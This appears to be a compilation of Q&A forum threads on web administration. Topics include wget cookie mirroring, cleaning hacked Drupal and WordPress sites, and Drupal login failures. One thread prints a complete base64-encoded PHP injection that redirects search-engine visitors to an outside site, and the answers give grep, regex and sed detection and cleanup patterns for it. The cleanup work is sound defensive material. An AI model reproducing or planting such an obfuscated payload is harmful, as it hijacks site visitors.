Getting past login page AND all subsequent ones - http

Before I start the question off, I want to say that a similar question helped me get past the initial login. My issue is as stated below.
There's a website that I'm trying to mirror. It is something that I have an account for. I'm using wget as my tool of choice. I tried curl, but found that while submitting post data is easy with it, wget is better equipped for the task at hand.
The website has an initial login page that it redirects to. After that, you have access to everything on the site. Logins do time out after a while, but that's it.
With the wget commands below, I was able to successfully save my cookies, load them, and download all the child folders. My issue, however, is that each child folder's index.html is the same login page. It's as though the cookie worked fine for the root folder but for nothing beneath it.
The commands I used were:
wget http://site.here.com/users/login --save-cookies cookies.txt --post-data 'email=example@test.com&password=*****&remember_me=1' --keep-session-cookies --delete-after
wget http://site.here.com/ --load-cookies cookies.txt --keep-session-cookies -r -np
Note that the post-data field names/ids on the real site are different, and I had to download the login page to see what they were.
Second, note that if I didn't set remember_me to 1, cookies.txt would be different.
Without remember_me=1
.here.com TRUE / FALSE numbershere CAKEPHP garbagehere
With remember_me=1
site.here.com FALSE / FALSE numbershere CakeCookie[rememberme] garbage
.here.com TRUE / FALSE numbershere CAKEPHP garbagehere
The result was that the former downloaded only the login page, while the latter reached all the child folders, but each child contained only the login-page index and nothing else.
I'm kind of stuck, and my experience with wget and HTTP is very limited. What would you do to get past this? Generate a cookie for each child? And how would you automate that instead of manually creating a cookie file for each child?
P.S.: I'm using Linux, if that affects the answers I'm given.

Figured it out. Kind of.
When I run wget with the options above, I get all the children. If I then wget each child (again with the options above) and make sure to specify it as a folder by ending the URL with "/", it works.
I'm not sure why the behavior is like this, but it is. Done this way, it has no problem grabbing the children's children, or anything further down.
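For anyone hitting the same wall, a minimal sketch of that per-child pass (the folder names are placeholders for whatever the root index actually lists; the trailing "/" is the important part):
for child in folder1 folder2 folder3; do
  wget "http://site.here.com/$child/" --load-cookies cookies.txt --keep-session-cookies -r -np
done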

Related

Pattern to find malicious code starting with eval(base64_decode

I've been having issues on my server with the following PHP inserted in all of my Drupal and WordPress sites.
I have downloaded a full backup of my sites and will clean them all before changing my ftp details and reuploading them again. Hopefully this should clear things up.
My question is:
Using Notepad++, is there a *.*-style search I could use to scan my backup files and delete the lines of malicious code, without having to do them all individually on my local machine?
This would clearly save me loads of time. Up to now I've been replacing the following code with a blank string, but the eval code varies on each of my sites.
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vY29zdGFicmF2YS5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9"));
I would change your FTP details immediately. You don't want them hosting warez or something if they have been able to work out the password.
Then shut down your site so that your visitors are not subjected to any scripts or hijacks.
As far as searching goes, a regex like this should sort it out (the character class covers the full base64 alphabet, including + / and the = padding):
eval\(base64_decode\("[A-Za-z0-9+/=]+"\)\);
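If you'd rather do the cleanup in bulk from a shell instead of file by file in Notepad++, a sketch using find with GNU sed. This is only a sketch, and since -i edits files in place, run it against a spare copy of the backup:
# strips the eval(base64_decode("...")); line from every .php file, in place
find . -name '*.php' -exec sed -i 's|eval(base64_decode("[A-Za-z0-9+/=]*"));||g' {} +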
I've also had the same problem with my WordPress blogs: the eval(base64_decode()) hack. The PHP files were being injected with those eval lines. I suggest you reinstall WordPress/Drupal, as other scripts may already be present on your site, then change all passwords.
Try running grep over SSH, e.g.:
grep -r -H "eval(base64_decode" .
It'll show you which files are infected. Then, if you have time, automate the process so you will be notified in case it happens again.
And in the future, always keep WordPress/Drupal up to date.
It's easier if you can use dedicated tools to remove this malicious code, because it can be tricky to find a regex that matches all of the code, and you never know whether it worked or whether you've broken your site. Especially when you have multiple files, you should first identify the suspicious files with the following commands:
grep -R eval.*base64_decode .
grep -R return.*base64_decode .
but that may not be enough, so you should also consider using a PHP security scanner.
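The two searches above can also be combined into one pass (a sketch using grep's extended-regex mode, restricted to PHP files):
grep -R -E '(eval|return).*base64_decode' --include='*.php' .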
For more details, check: How to get rid of eval-base64_decode like PHP virus files?.
For Drupal, check also: How to remove malicious scripts from admin pages after being hacked?

From where wp ecommerce is loading plugin theme files?

I updated my checkout page mostly by editing the file at ....wp-ecommerce/wpsc-theme/wpsc-shopping_cart_page.php
It worked fine for a while, but now some of the changes have reverted to their previous state. In fact, I can even delete the file mentioned above, so WordPress must be loading it from somewhere else. Any ideas where from, and what happened? Thanks for your help.
Although I don't have a specific answer to your question, if you use an IDE (like Dreamweaver or Eclipse) you could grab a copy of your site's code to your local PC and do a code search for something that is unique to that page.
I.e., if there is a <div class="a_unique_div"> tag somewhere on that page and you know it's only visible there, search the code for it; that may give you a clue as to which file produces the output. Even if it's used on only 1 or 2 pages, it may bring you closer to working it out.
Alternatively, if you have SSH access you could try and "grep" for the code by SSHing into your server and running a command like:
grep -i -R '<div class="a_unique_div">' /www/your_wp_folder/
(where /www/your_wp_folder/ is the path to your WordPress installation)
Though for this you'll need SSH access, grep installed on the server, etc, so it may not be a viable option.
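If you do have shell access, another angle worth a try is searching for the template's own filename rather than its HTML output, since whatever loads it may reference it by name (the path is a placeholder again):
grep -r -l "wpsc-shopping_cart_page" /www/your_wp_folder/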
Good luck!

Help with potential trojan passed through site

So I'm pretty sure my site's been infected with some kind of trojan or virus that attached itself to the scripting within the site. Every time I try to update my Drupal-based site, I get a white screen with this stupid "i'mhere" message. Upon reload, the changes take effect, but I don't know what this is doing once changes are saved. This only pops up while administering the site, i.e. posting new content, activating/deactivating modules, etc.
Problem is, I haven't the faintest idea how or where to go to remove this. The source code doesn't reference any malicious code. It isn't the iframe-link kind of trojan that I've seen brought up while trying to find an answer to this problem.
Things I've tried:
-Scanned my computer multiple times for viruses (supposedly these things steal insecure FTP data and hijack your client to upload malicious code)
-Changed FTP credentials
-Changed admin user passwords to the backend of the site (Drupal login)
-Updated Drupal
Nothing's worked so far and I'm at my wit's end trying to figure this out. Any tips in the right direction would be greatly appreciated.
Assuming the problem is really Drupal, first check to see if there's some code in a module somewhere firing during a form submit. If you have shell access and it's a Unix/Linux/etc.-based server, navigate to the Drupal directory and run:
grep -r "i'mhere" .
This will tell you if it exists in code and what file contains it. If it's a module (likely), disable it and either see if there's an update or modify it yourself.
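If you have drush available on the server, disabling a module from the command line might look like this (the module name is a placeholder):
drush pm-disable some_suspicious_module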
If it's not in code, check your database. Create a dump of your database, and run:
grep "i'mhere" databasedump.sql
Where databasedump.sql is the name of the database dump you just created. This should at least give you a general idea of what table the data exists in. Then, you can decide how you want to proceed: restore from a previous backup, delete the offending data, etc.
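If you haven't created the dump before, a minimal sketch with mysqldump (the username and database name are placeholders):
mysqldump -u dbuser -p drupal_db > databasedump.sql
grep "i'mhere" databasedump.sql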
If it's not in either, it might be local. Check with others to see if it's occurring for them.
If it's not local, you've got something really nasty and hopefully someone else has some other ideas on what you can check. :)
Here is a list of potentially useful tools that can help you alleviate, reduce, or prevent a virus infection:
bdcored chkrootkit clamd drwebd ipfw iptables kav lidsadm
logcheck logwatch ninja nod32 ossec portsentry rkhunter
sav sawmill shieldcc snort sxid sysmask tcplodg tripwire
uvscan wormscan zmbscap
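As one concrete starting point from that list, a recursive ClamAV scan of the web root might look like this (assuming ClamAV is installed and the path is adjusted to your setup):
clamscan -r --infected /var/www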
It comes straight out of an infamous piece of backdoor malware, described in this Stack Overflow article.
You may want to manually search for other instances of the virus by running this simple command:
grep -r "base64_decode" .
as suggested in this RAT infection article on thegothicparty.com:
http://thegothicparty.com/dev/article/server-side-virus-rat/

Cannot login to drupal in Chrome or Firefox, but Safari works

Problem: Login is not working in Firefox or Chrome, but it does work in Safari.
Details:
We just moved a Drupal 6 installation to another host and took these steps:
Moved sites/site1/Themes/themeFolder to sites/all/Themes/themeFolder.
Made these changes in page-node-NNN.tpl.php files (searched all files in themes/themeFolder):
1) find: /oldpath/ replace: /newpath/
2) find: oldsubdomain. replace: www.
3) find: .com/sites/ replace: .com/newpath/sites/
Then, when I log in, it fails in every browser if the wrong information is entered, but when it is correct it simply redirects to that user's profile page... and then nothing. There are no admin menus and no edit buttons for content; it is as though it authenticated but somehow never stored anything that would help with the authentication later.
The strange thing is that for 3 people on three different systems, Firefox and Chrome don't work, but Safari does. We have ruled out the database and old cookies.
Any one have a good guess?
Have you checked the $cookie_domain variable in your settings.php? It should be either commented out or adjusted to your new domain. (I faintly remember Safari having a slightly different cookie domain handling model than other browsers - not sure though.)
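A quick way to see what it's currently set to, assuming the default settings.php location:
grep -n 'cookie_domain' sites/default/settings.php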
You could also check the cookies set by the new site in the different browsers directly and compare for differences.
Another (wild) guess would be the date/time setting on the new host. It is pretty unlikely, but if the date is off into the past, the expiration dates of the cookies will be off too, and browsers might deal differently with that.
Also, you surely have flushed all Drupal caches after the move, haven't you?
I could log in to my client's Drupal site with Firefox but not with any other browser. It turned out my client's server clock was off by 2 years. Henrik mentioned this already, but I can confirm that was the cause for me.
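To check and fix the clock on a Linux host, something along these lines should work (assuming ntpdate is installed; it needs root):
date                  # show the server's current idea of the time
ntpdate pool.ntp.org  # one-shot sync against a public NTP pool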
OK, so this is an old post, and while the notes here were good, they did not completely resolve my similar issue. In the end, I found that my inability to log in was due not to a corrupt sessions table but to a lack of disk space on the server. So, if all else fails, log in to your server (Linux, etc.) and run df -h, which will display your disk availability stats. If you find that you're very low on space, run this command:
find / -type f -size +50000k -exec ls -lh {} \; | awk '{ print $9 ": " $5 }'
(this will find all files in excess of 50MB, a good place to start if you're doing a lot of logging, etc.). Then go through and remove the files you don't need (or simply add more disk).
I had a similar problem which was caused by a corrupt sessions table in the database. I fixed it by repairing the sessions table following the advice in the article at http://www.go2linux.org/cannot-login-into-drupal-table-corrupted
Wow, okay, I found out one thing that will cause this: having your Windows system time out of sync. If it is set several hours ahead of or behind the actual time, it can prevent you from logging in to your website. Restore it to the correct time, clear your cache and cookies, then close the browser and restart it. It worked for me!

Is there any way I could get this behavior with cURL?

I am testing one of my server implementations and was wondering if I could make curl get embedded content? I mean, when a browser loads a page, it downloads all associated content too... Can someone please tell me how to do this with curl?
I don't mind if it dumps even the binary data onto the terminal... I am trying to benchmark my server (keeping it simple initially to test for bugs... probably after this, I will use one of those dedicated tools like ab)...
wget --page-requisites
This option causes Wget to download all the files that are necessary to properly display a given HTML page.
If you want to download recursively, use wget with the -r option instead of curl. Also check out the wget man page for how to restrict the download to certain types of files.
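For a rough benchmark of a full page load, a sketch along these lines should work (the URL and output directory are placeholders):
time wget -q --page-requisites --no-directories --directory-prefix=/tmp/pagetest http://your.server/index.html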
